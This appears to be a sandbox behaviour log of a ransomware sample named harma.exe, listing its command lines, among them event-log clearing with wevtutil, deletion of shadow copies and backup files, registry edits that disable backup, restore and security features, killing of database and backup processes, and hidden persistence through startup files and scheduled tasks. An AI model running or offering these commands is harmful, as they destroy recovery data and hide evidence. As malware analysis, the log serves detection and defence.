wevtutil.exe cl "Microsoft-Windows-WWAN-MediaManager/Diagnostic"
3⤵
PID:4876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
3⤵
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-CFE/Diagnostic"
3⤵
PID:712

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPUS/Analytic"
3⤵
PID:4664

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPIP/Analytic"
3⤵
- Clears Windows event logs
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Analytic"
3⤵
PID:1108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPBT/Analytic"
3⤵
PID:3772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
3⤵
- Clears Windows event logs
PID:3232

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
3⤵
PID:4068

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
3⤵
PID:3788

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
3⤵
PID:3884

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-API/Analytic"
3⤵
PID:1612

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
3⤵
PID:4956

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
3⤵
PID:3356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
3⤵
PID:2736

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
3⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
3⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Debug"
3⤵
PID:1308

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-MediaManager/Diagnostic"
3⤵
- Clears Windows event logs
PID:3376

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-Driver/Analytic"
3⤵
PID:3352

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
3⤵
PID:2576

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
3⤵
PID:4988

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
3⤵
PID:672

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WER-PayloadHealth/Operational"
3⤵
PID:876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WEPHOSTSVC/Operational"
3⤵
PID:2828

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WCNWiz/Analytic"
3⤵
PID:840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
3⤵
PID:812

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
3⤵
PID:448

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Analytic"
3⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
3⤵
- Clears Windows event logs
PID:3280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VerifyHardwareSecurity/Operational"
3⤵
PID:1356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VerifyHardwareSecurity/Admin"
3⤵
PID:548

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
3⤵
PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VPN/Operational"
3⤵
PID:5072

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VIRTDISK-Analytic"
3⤵
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VHDMP-Analytic"
3⤵
PID:4144

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
3⤵
PID:3328

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
3⤵
PID:1384

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
3⤵
- Clears Windows event logs
PID:3996

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
3⤵
PID:1252

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
3⤵
PID:2280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
3⤵
PID:1088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceInstall"
3⤵
PID:1104

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
3⤵
PID:4720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserAccountControl/Diagnostic"
3⤵
PID:4388

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User-Loader/Operational"
3⤵
PID:920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
3⤵
PID:1764

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
3⤵
PID:3392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
3⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:1948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:3660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:3348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:1440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:4864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:4648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:4268

C:\Windows\SysWOW64\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:1232

C:\Windows\SysWOW64\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:5104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:1396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:4668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:2628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:2464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\HRMPUB
2⤵
PID:4736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win h:*.dsk
2⤵
PID:748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win g:*.dsk
2⤵
PID:2720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win f:*.dsk
2⤵
PID:5072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win e:*.dsk
2⤵
PID:3328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win c:*.dsk
2⤵
PID:1292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:3680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:4716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:3108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:4568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:1088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:2744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:4268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
2⤵
PID:3568

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
3⤵
PID:112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
2⤵
PID:412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
2⤵
PID:3440

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
1⤵
- Drops startup file
- Views/modifies file attributes
PID:1956

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /RU SYSTEM /RL HIGHEST /F
1⤵
- Creates scheduled task(s)
PID:4336

C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\harma.exe
1⤵
- Views/modifies file attributes
PID:3592

C:\Windows\SysWOW64\attrib.exe
attrib +h +s harma.exe
1⤵
- Views/modifies file attributes
PID:3244

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
1⤵
PID:548

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /im sql*
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im veeam*
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
1⤵
PID:464

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
1⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
1⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c wmic shadowcopy delete
1⤵
PID:112

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
2⤵
PID:624

C:\Windows\SysWOW64\net.exe
net stop McAfeeDLPAgentService /y
1⤵
PID:1332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
2⤵
PID:4628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:1420

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\SysWOW64\net.exe
net stop mfewc /y
1⤵
PID:4472

C:\Windows\SysWOW64\net.exe
net stop NetBackup BMR MTFTP Service /y
1⤵
PID:2976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
2⤵
PID:2736

C:\Windows\SysWOW64\sc.exe
sc config SQLTELEMETRY start=disabled
1⤵
- Launches sc.exe
PID:816

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mspub.exe /F
1⤵
- Kills process with taskkill
PID:2336

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mydesktopqos.exe /F
1⤵
- Kills process with taskkill
PID:1900

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mydesktopservice.exe /F
1⤵
- Kills process with taskkill
PID:1772

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
1⤵
PID:4616

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
1⤵
PID:320

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
1⤵
PID:2568

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
1⤵
PID:208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe el
1⤵
PID:4084

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Analytic"
1⤵
PID:3184

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
1⤵
PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "FirstUXPerf-Analytic"
1⤵
PID:4988

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "IHM_DebugChannel"
1⤵
PID:4628

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
1⤵
PID:2628

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
1⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationDS"
1⤵
PID:1912

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationMediaEngine"
1⤵
PID:1684

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationMP4"
1⤵
PID:3336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
1⤵
PID:2548

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
1⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Debug"
1⤵
PID:2744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
1⤵
PID:4720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
1⤵
PID:948

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
1⤵
PID:464

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
1⤵
PID:3208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
1⤵
- Clears Windows event logs
PID:1484

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
1⤵
PID:4064

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
1⤵
PID:448

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
1⤵
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
1⤵
PID:3376

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
1⤵
PID:3440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
1⤵
PID:3744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
1⤵
PID:412

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
1⤵
PID:4596

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
1⤵
PID:1192

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
1⤵
PID:5076

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
1⤵
- Clears Windows event logs
PID:3772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
1⤵
PID:4220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
1⤵
PID:2380

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
1⤵
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
1⤵
PID:1608

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
1⤵
PID:4500

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:1616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
1⤵
PID:3244

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
1⤵
PID:2176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
1⤵
PID:4564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
1⤵
PID:3816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
1⤵
PID:2680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
1⤵
PID:100

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
1⤵
PID:220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
1⤵
PID:2260

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
1⤵
PID:4720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
1⤵
PID:3332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
1⤵
PID:2172

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
1⤵
PID:212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
1⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
1⤵
PID:1948

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
1⤵
PID:436

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
1⤵
PID:208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
1⤵
PID:3972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
1⤵
PID:812

C:\Windows\SysWOW64\wevtutil.exe
